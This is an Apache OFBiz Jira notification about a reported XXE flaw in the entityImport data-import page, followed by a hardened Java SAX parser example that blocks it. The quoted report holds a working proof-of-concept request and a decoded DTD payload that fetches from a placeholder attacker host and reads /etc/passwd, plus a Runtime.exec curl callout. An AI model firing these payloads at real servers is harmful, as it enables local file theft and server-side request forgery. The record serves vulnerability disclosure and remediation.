[ 
https://issues.apache.org/jira/browse/OFBIZ-11197?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jacques Le Roux updated OFBIZ-11197:
------------------------------------
        Parent: OFBIZ-1525
    Issue Type: Sub-task  (was: Bug)

> Arbitrary Code Execution
> ------------------------
>
>                 Key: OFBIZ-11197
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-11197
>             Project: OFBiz
>          Issue Type: Sub-task
>          Components: framework/webtools
>    Affects Versions: Trunk
>            Reporter: Jacques Le Roux
>            Priority: Major
>
> This was reported to the OFBiz security team by Jason Nordenstam from 
> offensive-security.com. We did not consider it a real security issue 
> because it requires authentication.
> {quote}
> Authenticated users can import XML documents containing DTDs. The SAX parser 
> used by the XML Data Import functionality does not have DTD parsing 
> explicitly disabled which makes it vulnerable to XXE attacks.
> The results of the import are not displayed in the page which means an 
> 'error-based' approach is needed to read local files. The parser will also 
> resolve external entities so this vulnerability can also be used for internal 
> port scanning or server-side request forgery.
>  Affected URL:
>  /webtools/control/entityImport
> POC Example Request:
>  POST /webtools/control/entityImport HTTP/1.1
>  Host:<host>
>  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 
> Firefox/60.0
>  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>  Accept-Language: en-US,en;q=0.5
>  Accept-Encoding: gzip, deflate
>  Referer: <host>/webtools/control/entityImport
>  Content-Type: application/x-www-form-urlencoded
>  Content-Length: 312
>  Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
>  Connection: close
>  Upgrade-Insecure-Requests: 1
> fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A
> Payload One Decoded:
>  <?xml version="1.0" encoding="utf-8"?>
>  <!DOCTYPE notfound [
>  <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
>  %base;
>  %param1;
>  %external;
>  ]>
>  <root><foo>bar</bar></root>
> error.dtd on Attacking Machine:
>  <!ENTITY % payload SYSTEM "file:///etc/passwd">
>  <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>" >
> {quote}
> Works using:
> Runtime rt = Runtime.getRuntime();
> rt.exec("curl https://demo-trunk.ofbiz.apache.org:9090/pingtest");
> We get:
> ofbizDemo@ofbiz-vm3:~$ python -m SimpleHTTPServer 9090
> Serving HTTP on 0.0.0.0 port 9090 ...
> 172.31.43.132 - - [31/Aug/2019 07:37:00] code 400, message Bad request syntax 
> ("\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03\x900q\xa3\xae 
> a\xc4\r\xb6eA\xd8\x0bv/\x13k\xce\x01Q\xd4\xd3\x87w\\I\xca\x8b~\xab\xa4 
> 2Re|\xdc\xcb\x85p\x8f\x8e\xab\xee\x04*\xe7\xcb\xfd\xba\x0eu\x14z\x91\xedN\xbd\x91\xb3jy\xae\xc7\x00>\x13\x02\x13\x03\x13\x01\xc0,\xc00\x00\x9f\xcc\xa9\xcc\xa8\xcc\xaa\xc0+\xc0/\x00\x9e\xc0$\xc0(\x00k\xc0#\xc0'\x00g\xc0")
> Not sure what we can really do with that on OFBiz server side, but clearly 
> something happens
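The report above attributes the issue to a SAX parser that never had DTD processing disabled. The following is an added example, not OFBiz code, of how an import endpoint can build a SAX reader that refuses any DOCTYPE and never resolves external entities; the class and method names are assumed, and the two input documents are constructed for the demonstration.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedSaxImport {
    // Build an XMLReader that refuses any DOCTYPE and never fetches external
    // entities or DTDs. The feature URIs are the standard SAX/Xerces ones.
    static XMLReader hardenedReader() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setNamespaceAware(true);
        f.setXIncludeAware(false);
        // A data import never needs a DTD: reject the declaration outright.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth should an implementation ignore the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        XMLReader r = f.newSAXParser().getXMLReader();
        // JAXP 1.5 property: an empty protocol list forbids fetching any external DTD.
        r.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        return r;
    }

    // Returns true when the document parsed, false when the hardened reader
    // rejected it (a DOCTYPE is the case an import endpoint must refuse).
    static boolean tryImport(String xml) throws Exception {
        XMLReader r = hardenedReader();
        r.setContentHandler(new DefaultHandler());
        try {
            r.parse(new InputSource(new StringReader(xml)));
            return true;
        } catch (SAXParseException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: a plain import document, and the same document
        // preceded by a DOCTYPE declaring an internal entity.
        String plain = "<?xml version=\"1.0\"?><root><foo>bar</foo></root>";
        String withDtd = "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY x \"bar\">]><root><foo>&x;</foo></root>";
        System.out.println("plain accepted: " + tryImport(plain));
        System.out.println("doctype accepted: " + tryImport(withDtd));
    }
}
```

With the JDK's built-in parser the second document fails at the DOCTYPE before any entity is declared, so neither the error-based file read nor the outbound SYSTEM fetch described in the report can occur.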



--
This message was sent by Atlassian Jira
(v8.3.2#803003)
